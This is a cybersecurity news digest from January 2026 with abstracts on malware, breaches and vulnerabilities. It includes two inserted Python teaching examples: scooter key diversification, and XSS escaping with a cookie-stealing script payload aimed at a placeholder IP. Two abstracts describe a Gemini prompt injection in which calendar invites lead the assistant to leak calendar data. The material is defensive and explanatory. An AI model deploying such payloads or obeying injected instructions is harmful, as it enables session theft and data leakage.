Inside a Multi-Stage Windows Malware Campaign Full Text
Abstract
A sophisticated multi-stage malware campaign is targeting Microsoft Windows users, primarily in Russia. The attack leverages social engineering, security control bypass, and ransomware deployment.Fortinet
January 21, 2026 – Phishing
Hackers target Afghan government workers with fake correspondence from senior officials Full Text
Abstract
A phishing campaign has been identified targeting Afghan government employees with emails disguised as official correspondence from the office of the prime minister. The campaign uses a decoy document to deliver malware named FalseCub.The Record
January 21, 2026 – Breach
Everest Ransomware Claims McDonalds India Breach Involving Customer Data Full Text
Abstract
The Everest ransomware group has claimed responsibility for a significant data breach involving McDonald's India. The group claims to have exfiltrated 861 GB of sensitive data, including customer information and internal company documents.Hack Read
January 20, 2026 – General
Cyber Breaches, Compliance and Reputation Top UK Corporate Concerns Full Text
Abstract
Over half (58%) of respondents ranked cyber-related breaches as their top risk, and three-quarters doubted their ability to manage them. The concern is grounded in experience: 20% said they had suffered a breach in the past two years.Infosecurity Magazine
January 20, 2026 – Vulnerabilities
Google Gemini Prompt Injection Flaw Exposed Private Calendar Data via Malicious Invites Full Text
Abstract
Cybersecurity researchers have disclosed details of a security flaw that leverages indirect prompt injection targeting Google Gemini as a way to bypass authorization guardrails and use Google Calendar as a data extraction mechanism.The Hacker News
January 20, 2026 – Criminals
Tudou Guarantee Marketplace Halts Telegram Transactions After Processing Over $12 Billion Full Text
Abstract
A Telegram-based guarantee marketplace known for advertising a broad range of illicit services appears to be winding down its operations. The closure of Tudou is a significant blow to the Southeast Asian scam economy.The Hacker News
January 20, 2026 – Vulnerabilities
New StackWarp Hardware Flaw Breaks AMD SEV-SNP Protections on Zen 1–5 CPUs Full Text
Abstract
A new hardware vulnerability, named StackWarp, has been identified in AMD processors, specifically affecting Zen 1 through Zen 5 models. The flaw allows an attacker with privileged control over the host server to execute malicious code inside the confidential virtual machines (CVMs) that SEV-SNP is meant to protect from the host.The Hacker News
January 20, 2026 – Malware
Fake ad blocker extension crashes the browser for ClickFix attacks Full Text
Abstract
A malicious ad-blocker extension called NexShield has been discovered, targeting Chrome and Edge users through a malvertising campaign. This extension creates a DoS condition by generating infinite connections, leading to browser crashes.Bleeping Computer
January 20, 2026 – Malware
PDFSIDER Malware - Exploitation of DLL Side-Loading for AV and EDR Evasion Full Text
Abstract
A new strain of malware known as PDFSIDER has been deployed in ransomware attacks against a Fortune 100 company in the finance sector. Attackers utilized social engineering tactics to gain initial access.Resecurity
January 20, 2026 – Government
UK govt. warns about ongoing Russian hacktivist group attacks Full Text
Abstract
The UK government has issued a warning about ongoing DDoS attacks by the Russian-aligned hacktivist group NoName057(16), targeting critical infrastructure and local government organizations.Bleeping Computer
January 19, 2026 – Vulnerabilities
Google Gemini AI Tricked Into Leaking Calendar Data via Meeting Invites Full Text
Abstract
A vulnerability in Google Gemini AI allows attackers to exploit calendar invites to extract private data. This attack uses Indirect Prompt Injection, embedding commands in meeting invites that instruct Gemini to leak information.Hack Read
January 19, 2026 – Breach
Ingram Micro admits ransomware raid exposed staff records Full Text
Abstract
Ingram Micro experienced a significant ransomware attack in July 2025, compromising the personal data of over 42,000 employees. The attack, claimed by the ransomware group SafePay, resulted in substantial operational disruptions and data exposure.The Register
January 19, 2026 – Attack
From Extension to Infection: An In-Depth Analysis of the Evelyn Stealer Campaign Targeting Software Developers Full Text
Abstract
The Evelyn Stealer campaign targets software developers by exploiting the Visual Studio Code (VSC) extension ecosystem. This sophisticated attack chain involves a multistage delivery method designed to exfiltrate sensitive information.Trend Micro
January 19, 2026 – Attack
Hacktivists hijacked Iran's state TV to air anti-regime messages and an appeal to protest from Reza Pahlavi Full Text
Abstract
Anti-regime activists hijacked Iran’s Badr satellite and briefly took control of state TV channels to broadcast messages from Crown Prince Reza Pahlavi, calling for protests against the Islamic Republic.Security Affairs
January 19, 2026 – Breach
StealC hackers hacked as researchers hijack malware control panels Full Text
Abstract
An XSS vulnerability in the StealC malware's control panel has been exploited by researchers to gather intelligence on the malware operators. This flaw allowed researchers to hijack sessions and collect data on the attackers' hardware and location.Bleeping Computer
January 19, 2026 – General
Global tensions are pushing cyber activity toward dangerous territory Full Text
Abstract
The intersection of cybersecurity and geopolitics is becoming increasingly pronounced, with state-sponsored cyber operations being used as tools of political influence and conflict.Help Net Security
January 19, 2026 – Policy and Law
A new European standard outlines security requirements for AI Full Text
Abstract
The European Telecommunications Standards Institute (ETSI) has introduced a new standard, ETSI EN 304 223, to address cybersecurity requirements for AI models and systems. This standard is crucial for security teams working with AI.Help Net Security
January 19, 2026 – General
When the Olympics connect everything, attackers pay attention Full Text
Abstract
The Milan Cortina 2026 Winter Olympic Games present a significant cybersecurity challenge. This includes temporary networks, pop-up systems, and numerous partnerships, all of which create a target-rich environment for cyber threat actors.Help Net Security
January 19, 2026 – Breach
Canadian investment regulator confirms hackers hit 750,000 investors Full Text
Abstract
The Canadian Investment Regulatory Organization (CIRO) has confirmed a data breach affecting approximately 750,000 investors due to a sophisticated phishing attack. CIRO confirmed that login credentials were not at risk during the breach.The Record
January 17, 2026 – APT
China-Linked APT Exploits Sitecore Zero-Day in Attacks on American Critical Infrastructure Full Text
Abstract
A China-linked advanced persistent threat (APT) group, identified as UAT-8837, has been exploiting a critical zero-day vulnerability in Sitecore (CVE-2025-53690, CVSS score: 9.0) to target critical infrastructure sectors in North America.The Hacker News
January 17, 2026 – Vulnerabilities
Critical Vulnerability in Festo Firmware Affects Multiple Products Full Text
Abstract
A critical vulnerability has been identified in the firmware of multiple Festo products, affecting a wide range of devices used in critical manufacturing sectors globally. The vulnerability is tracked as CVE-2022-3270.CISA
January 17, 2026 – Vulnerabilities
Bankrupt scooter startup’s single key controlled everything Full Text
Abstract
An Estonian e-scooter company, Äike, which has gone bankrupt, left a significant security flaw in its devices. The scooters were shipped with a default private key that was never individualized, allowing any scooter to be unlocked using the same key.The Register
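Added example, not Äike's firmware or protocol: a simplified model of the design flaw and its fix. It assumes a symmetric challenge-response unlock (HMAC-SHA256 over serial and nonce) rather than the asymmetric scheme the article describes, a constructed master secret and constructed serial numbers. The "shared" fleet bakes one key into every unit, the "diversified" fleet derives a per-device key from the master secret and the serial, so a key extracted from one scooter no longer unlocks any other.

```python
import hashlib
import hmac
import secrets

# Constructed placeholders for this example. In a real deployment the master
# secret lives in the backend HSM and never leaves it; only derived keys are
# provisioned into devices and rider apps.
MASTER_SECRET = b"example-master-secret-do-not-ship"
SERIALS = ["SCOOTER-0001", "SCOOTER-0002", "SCOOTER-0003"]
CONTEXT = b"scooter-unlock-v1"   # domain-separation label for the derivation


def derive_device_key(master, serial):
    """HKDF-style extract-then-expand keyed on the device serial, so every
    unit gets a distinct 32-byte key (key individualization)."""
    prk = hmac.new(CONTEXT, master, hashlib.sha256).digest()      # extract
    return hmac.new(prk, serial.encode() + b"\x01", hashlib.sha256).digest()  # expand


class Scooter:
    """Lock controller: issues a fresh nonce and accepts an HMAC over
    (serial || nonce) under the key it was provisioned with."""

    def __init__(self, serial, key):
        self.serial, self._key = serial, key
        self._nonce = None

    def challenge(self):
        self._nonce = secrets.token_bytes(16)
        return self._nonce

    def unlock(self, response):
        expected = hmac.new(self._key, self.serial.encode() + self._nonce,
                            hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)


def app_response(key, serial, nonce):
    """What a rider app holding `key` for `serial` answers to a challenge."""
    return hmac.new(key, serial.encode() + nonce, hashlib.sha256).digest()


def build_fleet(diversified):
    """diversified=False: the flawed design, one key in every unit.
    diversified=True: per-device keys from derive_device_key."""
    if diversified:
        return {s: Scooter(s, derive_device_key(MASTER_SECRET, s)) for s in SERIALS}
    shared = hashlib.sha256(MASTER_SECRET).digest()
    return {s: Scooter(s, shared) for s in SERIALS}


def cross_unlock(fleet, key_from_serial, target_serial):
    """Attacker extracted the key from scooter `key_from_serial` (e.g. by
    dumping its firmware). Can that key unlock `target_serial`?"""
    stolen_key = fleet[key_from_serial]._key
    target = fleet[target_serial]
    nonce = target.challenge()
    return target.unlock(app_response(stolen_key, target_serial, nonce))


if __name__ == "__main__":
    for diversified in (False, True):
        fleet = build_fleet(diversified)
        print("diversified" if diversified else "shared key   ",
              "own unit:", cross_unlock(fleet, "SCOOTER-0002", "SCOOTER-0002"),
              "other unit:", cross_unlock(fleet, "SCOOTER-0001", "SCOOTER-0002"))
```

The check that matters is the last column: with a shared key, the key from unit 0001 unlocks unit 0002; with per-device derivation it does not, and compromise is contained to the one device whose firmware was dumped. Revoking a leaked device key then means reprovisioning one scooter, not the whole fleet.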
January 17, 2026 – Botnet
RondoDox botnet exploits critical HPE OneView bug Full Text
Abstract
A critical vulnerability in HPE OneView, identified as CVE-2025-37164, is being exploited at scale by the RondoDox botnet. This remote code execution flaw carries the maximum CVSS severity score of 10.0.The Register
January 17, 2026 – Attack
TamperedChef serves bad ads, with infostealers as the main course Full Text
Abstract
The TamperedChef campaign is a sophisticated malvertising operation leveraging Google Ads to distribute infostealers. It targets users searching for PDF software and redirects them to malicious sites.Sophos
January 16, 2026 – Vulnerabilities
Years-Old Vulnerable Apache Struts 2 Versions See 387K Weekly Downloads Full Text
Abstract
A critical vulnerability, CVE-2025-68493, has been identified in Apache Struts 2, affecting versions 2.0.0 through 6.1.0. This flaw, discovered by Zast AI, involves unsafe XML parsing in the XWork component, which can lead to system crashes.Hack Read
January 16, 2026 – Breach
Texas behavioral health center warns patients of data breach that leaked SSNs, medical info Full Text
Abstract
Spindletop Center, a behavioral health clinic in Texas, experienced a significant data breach in September 2025. Rhysida ransomware claimed responsibility for the attack, demanding a ransom of 15 bitcoin, equivalent to $1.65 million at the time.CompariTech
January 16, 2026 – Malware
GhostPoster Browser Malware Hid for 5 Years With 840,000 Installs Full Text
Abstract
The GhostPoster malware campaign has been active for five years, affecting over 840,000 users through browser extensions on Chrome, Firefox, and Edge. The malware uses hidden payloads within PNG images to evade detection.Hack Read
January 16, 2026 – Phishing
China spies used Maduro capture as lure to phish US agencies Full Text
Abstract
Chinese cyberspies, identified as the Mustang Panda group, have launched a targeted phishing campaign against US government agencies. The campaign used the geopolitical event of Venezuelan President Nicolás Maduro's capture as a lure.The Register
January 16, 2026 – Vulnerabilities
CISA’s secure-software buying tool had a simple XSS vulnerability of its own Full Text
Abstract
An XSS vulnerability was discovered in CISA's "Software Acquisition Guide: Supplier Response Web Tool." This vulnerability allowed attackers to inject malicious JavaScript into the web page, potentially affecting other users and defacing the website.Cyber Scoop
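Added example, not code from CISA's web tool or from the StealC panel research above: the same class of bug in both stories (untrusted input rendered into a page unescaped) shown as a vulnerable renderer beside a hardened one, plus the cookie attributes that stop a successful injection from reading a session token, which is the classic route from stored XSS to session hijack. The field names, payloads and URLs are constructed for illustration.

```python
import html

# Constructed attacker-supplied inputs (not the payloads from either article).
SCRIPT_PAYLOAD = '<script>fetch("http://203.0.113.9/?c=" + document.cookie)</script>'
ATTR_PAYLOAD = 'https://example.test/" onmouseover="alert(1)'   # breaks out of href=""


def render_unsafe(supplier_name, website):
    """Vulnerable: untrusted strings interpolated straight into markup.
    A <script> in the name runs; a quote in the URL adds an event handler."""
    return f'<p>Supplier: {supplier_name}</p><a href="{website}">site</a>'


def safe_url(value):
    """Scheme allow-list for link targets: javascript:, data: and friends are
    replaced rather than escaped, because escaping does not neutralize them."""
    return value if value.lower().startswith(("http://", "https://")) else "about:blank"


def render_safe(supplier_name, website):
    """Hardened: HTML-escape for the text context; quote-escape plus the
    scheme allow-list for the attribute context. Encoding is per context,
    which is why the two inputs are handled differently."""
    return (f"<p>Supplier: {html.escape(supplier_name, quote=True)}</p>"
            f'<a href="{html.escape(safe_url(website), quote=True)}">site</a>')


def session_cookie(token):
    """Set-Cookie attributes so that even a successful injection cannot read
    the session from document.cookie or ride along on cross-site requests."""
    return f"session={token}; Path=/; Secure; HttpOnly; SameSite=Strict"


def tag_count(markup, tag):
    """Count raw opening tags of `tag` in rendered output (test oracle)."""
    return markup.lower().count(f"<{tag}")


if __name__ == "__main__":
    print("unsafe:", render_unsafe(SCRIPT_PAYLOAD, ATTR_PAYLOAD))
    print("safe:  ", render_safe(SCRIPT_PAYLOAD, ATTR_PAYLOAD))
    print(session_cookie("constructed-token"))
```

Output encoding is the fix for the injection itself; the HttpOnly flag is defence in depth that limits what an injection that does get through can steal, and it is what separates "attacker can deface a page" from "attacker can take over the operator's session".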